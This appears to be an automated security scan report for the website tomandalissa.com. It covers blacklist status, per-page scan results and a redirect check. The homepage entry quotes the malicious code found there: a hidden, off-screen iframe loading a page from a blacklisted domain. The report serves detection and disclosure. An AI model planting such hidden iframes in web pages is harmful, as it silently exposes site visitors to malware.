Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tomandalissa.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tomandalissa.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tomandalissa.com/ | 200 OK Content-Length: 2825 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ajwcjwk.dns1.us
<div style="position: absolute; left: -1993px; top: -2998px;"><iframe width="20" height="20" src="http://ajwcjwk.dns1.us/main.php?page=c69bd02e93e6957c"></iframe></div>
http://www.tomandalissa.com/blog | 200 OK Content-Length: 1309 Content-Type: text/html | clean |
http://www.tomandalissa.com/test404page.js | 200 OK Content-Length: 1309 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tomandalissa.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tomandalissa.com
Referer: http://www.google.com/search?q=tomandalissa.com
Result:
The result is similar to the first query. There are no suspicious redirects found.